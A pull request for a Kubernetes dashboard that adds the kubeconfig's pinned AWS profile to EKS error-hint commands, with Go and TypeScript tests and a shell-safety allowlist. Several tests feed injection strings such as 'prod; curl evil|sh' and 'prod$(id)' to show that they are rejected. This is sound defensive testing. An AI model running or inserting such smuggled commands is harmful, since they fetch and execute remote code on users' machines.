### PR TITLE
Show AWS profile in EKS auth error hints

### DIFF
--- a/internal/k8s/client.go
+++ b/internal/k8s/client.go
@@ -1461,6 +1461,35 @@ type ContextInfo struct {
 	// loading; populated for every context — not just colliding ones — so
 	// the dropdown can show provenance even without ambiguity.
 	Source string `json:"source,omitempty"`
+	// AWSProfile is the AWS profile used by this context's exec plugin,
+	// extracted from --profile arg or AWS_PROFILE env var. Set only for
+	// EKS-style exec plugins (aws, aws-iam-authenticator).
+	AWSProfile string `json:"awsProfile,omitempty"`
+}
+
+func extractAWSProfile(ai *clientcmdapi.AuthInfo) string {
+	if ai == nil || ai.Exec == nil {
+		return ""
+	}
+	exec := ai.Exec
+	base := filepath.Base(exec.Command)
+	if base != "aws" && base != "aws-iam-authenticator" {
+		return ""
+	}
+	for i, arg := range exec.Args {
+		if arg == "--profile" && i+1 < len(exec.Args) {
+			return exec.Args[i+1]
+		}
+		if strings.HasPrefix(arg, "--profile=") {
+			return strings.TrimPrefix(arg, "--profile=")
+		}
+	}
+	for _, env := range exec.Env {
+		if env.Name == "AWS_PROFILE" {
+			return env.Value
+		}
+	}
+	return ""
 }
 
 // GetAvailableContexts returns all available contexts from the kubeconfig
@@ -1531,6 +1560,8 @@ func GetAvailableContexts() ([]ContextInfo, error) {
 	fileConfigs := perFileConfigs
 	currentCtx := contextName
 	singlePath := kubeconfigPath
+	activeCtxName := activeSourceName
+	activeConfig := activeSourceConfig
 	clientMu.Unlock()
 	if len(refreshEmptyAIs) > 0 {
 		recordEmptyCommandWarning("kubeconfig-refresh", refreshEmptyAIs)
@@ -1559,6 +1590,16 @@ func GetAvailableContexts() ([]ContextInfo, error) {
 			if !ok || ctx == nil {
 				continue
 			}
+			var awsProfile string
+			// For the active context use the snapshotted config from client
+			// creation so the hint matches the credential actually in use.
+			profileCfg := cfg
+			if qName == currentCtx && activeConfig != nil && activeCtxName == entry.InFileName {
+				profileCfg = activeConfig
+			}
+			if ai := profileCfg.AuthInfos[ctx.AuthInfo]; ai != nil {
+				awsProfile = extractAWSProfile(ai)
+			}
 			contexts = append(contexts, ContextInfo{
 				Name:         qName,
 				OriginalName: entry.InFileName,
@@ -1567,6 +1608,7 @@ func GetAvailableContexts() ([]ContextInfo, error) {
 				Namespace:    ctx.Namespace,
 				IsCurrent:    qName == currentCtx,
 				Source:       kubeconfigSourceLabel(entry.SourceFile),
+				AWSProfile:   awsProfile,
 			})
 		}
 		return contexts, nil
@@ -1593,12 +1635,21 @@ func GetAvailableContexts() ([]ContextInfo, error) {
 	contexts := make([]ContextInfo, 0, len(rawConfig.Contexts))
 	for _, name := range sortedContextNames(&rawConfig) {
 		ctx := rawConfig.Contexts[name]
+		var awsProfile string
+		profileCfg := &rawConfig
+		if name == currentCtx && activeConfig != nil && activeCtxName == name {
+			profileCfg = activeConfig
+		}
+		if ai := profileCfg.AuthInfos[ctx.AuthInfo]; ai != nil {
+			awsProfile = extractAWSProfile(ai)
+		}
 		contexts = append(contexts, ContextInfo{
-			Name:      name,
-			Cluster:   ctx.Cluster,
-			User:      ctx.AuthInfo,
-			Namespace: ctx.Namespace,
-			IsCurrent: name == currentCtx,
+			Name:       name,
+			Cluster:    ctx.Cluster,
+			User:       ctx.AuthInfo,
+			Namespace:  ctx.Namespace,
+			IsCurrent:  name == currentCtx,
+			AWSProfile: awsProfile,
 		})
 	}
 	return contexts, nil

--- a/internal/k8s/client_test.go
+++ b/internal/k8s/client_test.go
@@ -978,3 +978,97 @@ func containsSubstring(haystack, needle string) bool {
 	}
 	return false
 }
+
+func TestExtractAWSProfile(t *testing.T) {
+	tests := []struct {
+		name string
+		ai   *clientcmdapi.AuthInfo
+		want string
+	}{
+		{
+			name: "nil AuthInfo",
+			ai:   nil,
+			want: "",
+		},
+		{
+			name: "no exec block",
+			ai:   &clientcmdapi.AuthInfo{},
+			want: "",
+		},
+		{
+			name: "non-AWS exec command",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "gke-gcloud-auth-plugin",
+				Env:     []clientcmdapi.ExecEnvVar{{Name: "AWS_PROFILE", Value: "should-be-ignored"}},
+			}},
+			want: "",
+		},
+		{
+			name: "AWS_PROFILE env var",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws",
+				Args:    []string{"--region", "ap-southeast-1", "eks", "get-token", "--cluster-name", "my-cluster", "--output", "json"},
+				Env:     []clientcmdapi.ExecEnvVar{{Name: "AWS_PROFILE", Value: "myorg/my-account/my-role"}},
+			}},
+			want: "myorg/my-account/my-role",
+		},
+		{
+			name: "--profile flag (space-separated)",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws",
+				Args:    []string{"--profile", "my-profile", "eks", "get-token", "--cluster-name", "my-cluster"},
+			}},
+			want: "my-profile",
+		},
+		{
+			name: "--profile= (equals-separated)",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws",
+				Args:    []string{"--profile=my-profile", "eks", "get-token"},
+			}},
+			want: "my-profile",
+		},
+		{
+			name: "--profile arg with no following value",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws",
+				Args:    []string{"--profile"},
+			}},
+			want: "",
+		},
+		{
+			name: "--profile flag takes precedence over AWS_PROFILE env var",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws",
+				Args:    []string{"--profile", "from-flag"},
+				Env:     []clientcmdapi.ExecEnvVar{{Name: "AWS_PROFILE", Value: "from-env"}},
+			}},
+			want: "from-flag",
+		},
+		{
+			name: "aws-iam-authenticator command",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "aws-iam-authenticator",
+				Env:     []clientcmdapi.ExecEnvVar{{Name: "AWS_PROFILE", Value: "myorg/my-account/my-role"}},
+			}},
+			want: "myorg/my-account/my-role",
+		},
+		{
+			name: "full path to aws binary",
+			ai: &clientcmdapi.AuthInfo{Exec: &clientcmdapi.ExecConfig{
+				Command: "/usr/local/bin/aws",
+				Env:     []clientcmdapi.ExecEnvVar{{Name: "AWS_PROFILE", Value: "my-profile"}},
+			}},
+			want: "my-profile",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := extractAWSProfile(tt.ai)
+			if got != tt.want {
+				t.Errorf("extractAWSProfile() = %q, want %q", got, tt.want)
+			}
+		})
+	}
+}

--- a/packages/k8s-ui/src/types/core.ts
+++ b/packages/k8s-ui/src/types/core.ts
@@ -516,6 +516,9 @@ export interface ContextInfo {
   /** Source kubeconfig label (e.g. "kube-cluster-paris"). Set by the backend
    *  for contexts loaded through the isolated source registry. */
   source?: string
+  /** AWS profile extracted from the exec plugin's --profile arg or AWS_PROFILE
+   *  env var. Present only for EKS contexts that pin a profile. */
+  awsProfile?: string
 }
 
 // Namespace

--- a/web/src/components/ConnectionErrorView.test.tsx
+++ b/web/src/components/ConnectionErrorView.test.tsx
@@ -71,6 +71,36 @@ describe('ConnectionErrorView authentication guidance', () => {
     expect(hints.fallbackCommand?.command).toBe('aws sso login')
   })
 
+  it('pins the kubeconfig AWS profile on every EKS command that would otherwise use the ambient one', () => {
+    const context = 'arn:aws:eks:us-east-1:123456789012:cluster/prod'
+    const profile = 'myorg/prod/admin'
+
+    const rejected = getAuthRejectedHints(context, profile)
+    expect(rejected.fallbackCommand?.command).toBe('aws sso login --profile myorg/prod/admin')
+    expect(rejected.authCommand?.command).toBe(
+      'aws sts get-caller-identity --profile myorg/prod/admin && aws eks describe-cluster --name prod --region us-east-1 --profile myorg/prod/admin --query cluster.accessConfig.authenticationMode --output text',
+    )
+    expect(rejected.hints.join(' ')).not.toContain("terminal's current AWS profile")
+
+    const auth = selectConnectionHints('auth', context, undefined, profile)
+    expect(auth?.authCommand?.command).toBe('aws sso login --profile myorg/prod/admin')
+    expect(auth?.fallbackCommand?.command).toBe('aws eks update-kubeconfig --name prod --region us-east-1 --profile myorg/prod/admin')
+
+    const timeout = selectConnectionHints('timeout', context, undefined, profile)
+    expect(timeout?.authCommand?.command).toBe('aws sso login --profile myorg/prod/admin')
+    expect(timeout?.fallbackCommand?.command).toBe('aws eks update-kubeconfig --name prod --region us-east-1 --profile myorg/prod/admin')
+  })
+
+  it('drops a hostile AWS profile instead of interpolating it', () => {
+    const context = 'arn:aws:eks:us-east-1:123456789012:cluster/prod'
+    const hints = getAuthRejectedHints(context, 'prod; curl evil|sh')
+
+    expect(hints.fallbackCommand?.command).toBe('aws sso login')
+    expect(hints.authCommand?.command).toBe(
+      'aws sts get-caller-identity && aws eks describe-cluster --name prod --region us-east-1 --query cluster.accessConfig.authenticationMode --output text',
+    )
+  })
+
   it('does not offer interpolated commands for hostile GKE context values', () => {
     const hints = getAuthRejectedHints('gke_project_us-east1_prod;curl evil|sh')
 

--- a/web/src/components/ConnectionErrorView.tsx
+++ b/web/src/components/ConnectionErrorView.tsx
@@ -6,7 +6,7 @@ import { parseContextName } from '../utils/context-name'
 import { useOpenLocalTerminal, ClusterName } from '@skyhook-io/k8s-ui'
 import { useAuthMe, useContexts } from '../api/client'
 import { Tooltip } from './ui/Tooltip'
-import { allShellSafe, isShellSafeAWSProfile } from '../utils/shell-safe'
+import { allShellSafe, awsProfileFlag } from '../utils/shell-safe'
 import { apiUrl } from '../api/config'
 import { useCapabilitiesContext } from '../contexts/CapabilitiesContext'
 
@@ -54,7 +54,7 @@ function getAuthHints(context: string, awsProfile?: string): AuthHints {
       return result
     }
     case 'EKS': {
-      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
+      const profileFlag = awsProfileFlag(awsProfile)
       const result: AuthHints = {
         title: 'EKS Authentication Failed',
         hints: [
@@ -66,7 +66,7 @@ function getAuthHints(context: string, awsProfile?: string): AuthHints {
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
           label: 'If that doesn\'t work, refresh cluster credentials:',
-          command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}`,
+          command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}${profileFlag}`,
         }
       }
       return result
@@ -94,22 +94,29 @@ export function getAuthRejectedHints(context: string, awsProfile?: string): Auth
 
   switch (parsed.provider) {
     case 'EKS': {
-      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
+      const profileFlag = awsProfileFlag(awsProfile)
       const result: AuthHints = {
         title: 'EKS Could Not Authenticate This Request',
         hints: [
           'EKS returned HTTP 401, so Kubernetes could not authenticate this request.',
           'The AWS credential may be missing, stale, or revoked, or its IAM principal may not be mapped through an EKS access entry or the cluster\'s legacy aws-auth configuration.',
           'If the credential is current, ask a cluster admin to verify the mapping for the IAM principal used by this context.',
-          'The diagnostic uses the terminal\'s current AWS profile. If the kubeconfig exec block pins AWS_PROFILE or --role-arn, use that profile or role instead.',
+          profileFlag
+            ? 'The commands below use the AWS profile pinned by this context\'s kubeconfig exec block. If it also pins --role-arn, inspect that role instead.'
+            : 'The diagnostic uses the terminal\'s current AWS profile. If the kubeconfig exec block pins AWS_PROFILE or --role-arn, use that profile or role instead.',
           'API and API_AND_CONFIG_MAP modes use access entries; CONFIG_MAP mode uses the aws-auth ConfigMap.',
         ],
-        fallbackCommand: { label: 'If this context uses the current AWS SSO profile, re-login and retry:', command: `aws sso login${profileFlag}` },
+        fallbackCommand: {
+          label: profileFlag ? 'If this profile uses AWS SSO, re-login and retry:' : 'If this context uses the current AWS SSO profile, re-login and retry:',
+          command: `aws sso login${profileFlag}`,
+        },
       }
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.authCommand = {
-          label: 'Inspect the caller and authentication mode for the current terminal AWS profile:',
-          command: `aws sts get-caller-identity && aws eks describe-cluster --name ${parsed.clusterName} --region ${parsed.region} --query cluster.accessConfig.authenticationMode --output text`,
+          label: profileFlag
+            ? 'Inspect the caller and authentication mode for the pinned AWS profile:'
+            : 'Inspect the caller and authentication mode for the current terminal AWS profile:',
+          command: `aws sts get-caller-identity${profileFlag} && aws eks describe-cluster --name ${parsed.clusterName} --region ${parsed.region}${profileFlag} --query cluster.accessConfig.authenticationMode --output text`,
         }
         // A diagnostic, not a re-auth — the "Authenticate in terminal" button
         // would misrepresent what running it does.
@@ -194,7 +201,7 @@ function getTimeoutHints(context: string, awsProfile?: string): AuthHints | null
       return result
     }
     case 'EKS': {
-      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
+      const profileFlag = awsProfileFlag(awsProfile)
       const result: AuthHints = {
         title: 'Connection Timed Out',
         hints: [...baseHints, 'If the endpoint is reachable, AWS credentials or SSO may need refresh.'],
@@ -203,7 +210,7 @@ function getTimeoutHints(context: string, awsProfile?: string): AuthHints | null
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
           label: 'If that does not work, refresh cluster credentials:',
-          command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}`,
+          command: `aws eks update-kubeconfig --name ${parsed.clusterName} --region ${parsed.region}${profileFlag}`,
         }
       }
       return result

--- a/web/src/components/ConnectionErrorView.tsx
+++ b/web/src/components/ConnectionErrorView.tsx
@@ -6,7 +6,7 @@ import { parseContextName } from '../utils/context-name'
 import { useOpenLocalTerminal, ClusterName } from '@skyhook-io/k8s-ui'
 import { useAuthMe, useContexts } from '../api/client'
 import { Tooltip } from './ui/Tooltip'
-import { allShellSafe } from '../utils/shell-safe'
+import { allShellSafe, isShellSafeAWSProfile } from '../utils/shell-safe'
 import { apiUrl } from '../api/config'
 import { useCapabilitiesContext } from '../contexts/CapabilitiesContext'
 
@@ -33,7 +33,7 @@ interface AuthHints {
   hideAuthButton?: boolean
 }
 
-function getAuthHints(context: string): AuthHints {
+function getAuthHints(context: string, awsProfile?: string): AuthHints {
   const parsed = parseContextName(context)
 
   switch (parsed.provider) {
@@ -54,13 +54,14 @@ function getAuthHints(context: string): AuthHints {
       return result
     }
     case 'EKS': {
+      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
       const result: AuthHints = {
         title: 'EKS Authentication Failed',
         hints: [
           'Radar could not get AWS credentials for this context.',
           'For AWS SSO contexts, the SSO session may need login.',
         ],
-        authCommand: { label: 'If this context uses AWS SSO, refresh credentials:', command: 'aws sso login' },
+        authCommand: { label: 'If this context uses AWS SSO, refresh credentials:', command: `aws sso login${profileFlag}` },
       }
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
@@ -88,11 +89,12 @@ function getAuthHints(context: string): AuthHints {
   }
 }
 
-export function getAuthRejectedHints(context: string): AuthHints {
+export function getAuthRejectedHints(context: string, awsProfile?: string): AuthHints {
   const parsed = parseContextName(context)
 
   switch (parsed.provider) {
     case 'EKS': {
+      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
       const result: AuthHints = {
         title: 'EKS Could Not Authenticate This Request',
         hints: [
@@ -102,7 +104,7 @@ export function getAuthRejectedHints(context: string): AuthHints {
           'The diagnostic uses the terminal\'s current AWS profile. If the kubeconfig exec block pins AWS_PROFILE or --role-arn, use that profile or role instead.',
           'API and API_AND_CONFIG_MAP modes use access entries; CONFIG_MAP mode uses the aws-auth ConfigMap.',
         ],
-        fallbackCommand: { label: 'If this context uses the current AWS SSO profile, re-login and retry:', command: 'aws sso login' },
+        fallbackCommand: { label: 'If this context uses the current AWS SSO profile, re-login and retry:', command: `aws sso login${profileFlag}` },
       }
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.authCommand = {
@@ -167,7 +169,7 @@ function getAuthPluginStuckHints(): AuthHints {
   }
 }
 
-function getTimeoutHints(context: string): AuthHints | null {
+function getTimeoutHints(context: string, awsProfile?: string): AuthHints | null {
   const parsed = parseContextName(context)
   const baseHints = [
     'The Kubernetes API did not respond before the deadline.',
@@ -192,10 +194,11 @@ function getTimeoutHints(context: string): AuthHints | null {
       return result
     }
     case 'EKS': {
+      const profileFlag = awsProfile && isShellSafeAWSProfile(awsProfile) ? ` --profile ${awsProfile}` : ''
       const result: AuthHints = {
         title: 'Connection Timed Out',
         hints: [...baseHints, 'If the endpoint is reachable, AWS credentials or SSO may need refresh.'],
-        authCommand: { label: 'If this context uses AWS SSO and network access looks healthy, refresh credentials:', command: 'aws sso login' },
+        authCommand: { label: 'If this context uses AWS SSO and network access looks healthy, refresh credentials:', command: `aws sso login${profileFlag}` },
       }
       if (parsed.region && allShellSafe(parsed.clusterName, parsed.region)) {
         result.fallbackCommand = {
@@ -322,17 +325,17 @@ export function CopyableCommand({ command, onRunInTerminal }: { command: string;
   )
 }
 
-export function selectConnectionHints(errorType: string | undefined, context: string, originalContext?: string): AuthHints | null {
+export function selectConnectionHints(errorType: string | undefined, context: string, originalContext?: string, awsProfile?: string): AuthHints | null {
   const parsedContext = originalContext || context
   switch (errorType) {
     case 'auth':
-      return getAuthHints(parsedContext)
+      return getAuthHints(parsedContext, awsProfile)
     case 'auth-rejected':
-      return getAuthRejectedHints(parsedContext)
+      return getAuthRejectedHints(parsedContext, awsProfile)
     case 'auth-plugin-stuck':
       return getAuthPluginStuckHints()
     case 'timeout':
-      return getTimeoutHints(parsedContext)
+      return getTimeoutHints(parsedContext, awsProfile)
     default:
       return null
   }
@@ -344,9 +347,11 @@ export function ConnectionErrorView({ connection, onRetry, isRetrying }: Connect
   const isAuthRejected = connection.errorType === 'auth-rejected'
   const isAuthPluginStuck = connection.errorType === 'auth-plugin-stuck'
   const isAuthError = isAuth || isAuthRejected || isAuthPluginStuck
-  const { data: contexts } = useContexts()
-  const originalContext = contexts?.find((context) => context.name === connection.context)?.originalName
-  const commandInfo = selectConnectionHints(connection.errorType, connection.context || '', originalContext)
+  const { data: contexts, isLoading: contextsLoading } = useContexts()
+  const matchedContext = contexts?.find((context) => context.name === connection.context)
+  const originalContext = matchedContext?.originalName
+  const awsProfile = contextsLoading ? undefined : matchedContext?.awsProfile
+  const commandInfo = selectConnectionHints(connection.errorType, connection.context || '', originalContext, awsProfile)
   const errorInfo = commandInfo || errorHints[connection.errorType || 'unknown'] || errorHints.unknown
   const openLocalTerminal = useOpenLocalTerminal()
   const { data: authMe } = useAuthMe()

--- a/web/src/utils/shell-safe.test.ts
+++ b/web/src/utils/shell-safe.test.ts
@@ -1,6 +1,6 @@
 import { describe, expect, it } from 'vitest'
 
-import { allShellSafe, isShellSafeValue } from './shell-safe'
+import { allShellSafe, isShellSafeAWSProfile, isShellSafeValue } from './shell-safe'
 
 describe('isShellSafeValue', () => {
   it('accepts the values real provider context names produce', () => {
@@ -51,5 +51,29 @@ describe('allShellSafe', () => {
     expect(allShellSafe('prod', 'us-east-1', '123456789012')).toBe(true)
     expect(allShellSafe('prod', 'us-east-1; id')).toBe(false)
     expect(allShellSafe('prod', null)).toBe(false)
+  })
+})
+
+describe('isShellSafeAWSProfile', () => {
+  it('accepts simple and slash-separated profile names', () => {
+    expect(isShellSafeAWSProfile('default')).toBe(true)
+    expect(isShellSafeAWSProfile('myorg/my-account/my-role')).toBe(true)
+    expect(isShellSafeAWSProfile('prod-account')).toBe(true)
+  })
+
+  it('rejects shell metacharacters', () => {
+    expect(isShellSafeAWSProfile('prod; id')).toBe(false)
+    expect(isShellSafeAWSProfile('prod$(id)')).toBe(false)
+    expect(isShellSafeAWSProfile('prod profile')).toBe(false)
+  })
+
+  it('rejects leading dash', () => {
+    expect(isShellSafeAWSProfile('-rf')).toBe(false)
+  })
+
+  it('rejects empty and absent values', () => {
+    expect(isShellSafeAWSProfile('')).toBe(false)
+    expect(isShellSafeAWSProfile(null)).toBe(false)
+    expect(isShellSafeAWSProfile(undefined)).toBe(false)
   })
 })

--- a/web/src/utils/shell-safe.ts
+++ b/web/src/utils/shell-safe.ts
@@ -28,3 +28,10 @@ const SHELL_SAFE_AWS_PROFILE = /^[A-Za-z0-9][A-Za-z0-9._:@/-]*$/
 export function isShellSafeAWSProfile(value: string | null | undefined): value is string {
   return typeof value === 'string' && SHELL_SAFE_AWS_PROFILE.test(value)
 }
+
+// Returns ` --profile <name>` for embedding in an aws CLI hint, or '' when no
+// profile is pinned or the name fails the allowlist — the hint then falls
+// back to the ambient profile rather than offering nothing.
+export function awsProfileFlag(profile: string | null | undefined): string {
+  return isShellSafeAWSProfile(profile) ? ` --profile ${profile}` : ''
+}

--- a/web/src/utils/shell-safe.ts
+++ b/web/src/utils/shell-safe.ts
@@ -19,3 +19,12 @@ export function isShellSafeValue(value: string | null | undefined): value is str
 export function allShellSafe(...values: (string | null | undefined)[]): boolean {
   return values.every(isShellSafeValue)
 }
+
+// AWS SSO profile names may contain `/` as a path separator
+// (e.g. "myorg/my-account/my-role") — safe in shell arguments since `/`
+// has no special meaning to the shell itself.
+const SHELL_SAFE_AWS_PROFILE = /^[A-Za-z0-9][A-Za-z0-9._:@/-]*$/
+
+export function isShellSafeAWSProfile(value: string | null | undefined): value is string {
+  return typeof value === 'string' && SHELL_SAFE_AWS_PROFILE.test(value)
+}


### PR DESCRIPTION
When Radar cannot connect to an EKS cluster due to credential failure, the suggested `aws sso login` command now includes `--profile <name>` when the kubeconfig exec block pins a profile via the AWS_PROFILE env var or a --profile argument.

`aws eks update-kubeconfig` always injects the profile as AWS_PROFILE in the exec env block, so this covers the common real-world case.

## Description

Brief description of the changes in this PR.

## Type of change

- [ ] Bug fix (non-breaking change that fixes an issue)
- [x] New feature (non-breaking change that adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to change)
- [ ] Documentation update

## How has this been tested?

Describe the tests you ran to verify your changes.

- [ ] Tested locally with minikube/kind
- [ ] Tested against a remote cluster
- [x] Added/updated unit tests

## Checklist

- [ ] My code follows the project's coding standards
- [x] I have performed a self-review of my code
- [x] I have added comments where necessary
- [ ] My changes generate no new warnings
- [ ] Any dependent changes have been merged

## Related issues

Fixes #(issue number)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Low Risk**
> User-facing hint text and read-only kubeconfig parsing; shell interpolation is gated by an allowlist with tests for hostile profiles.
> 
> **Overview**
> **EKS connection errors now suggest AWS CLI commands with the same profile the kubeconfig exec block uses**, instead of assuming the terminal’s default profile.
> 
> The backend adds `awsProfile` on each context by parsing `aws` / `aws-iam-authenticator` exec auth (`--profile` or `AWS_PROFILE`). For the active context it prefers the snapshotted kubeconfig used at client creation so the hint matches live credentials. The UI waits for contexts to load, then threads `awsProfile` into EKS auth, auth-rejected, and timeout hints (`aws sso login`, `aws eks update-kubeconfig`, STS/describe diagnostics).
> 
> New `isShellSafeAWSProfile` / `awsProfileFlag` allow slash-separated SSO profile names but **omit** `--profile` when the value looks hostile, matching existing context-name safety for terminal-run commands.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 713af2494e63009b0c2c33049f17d6521a3d7f6b. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->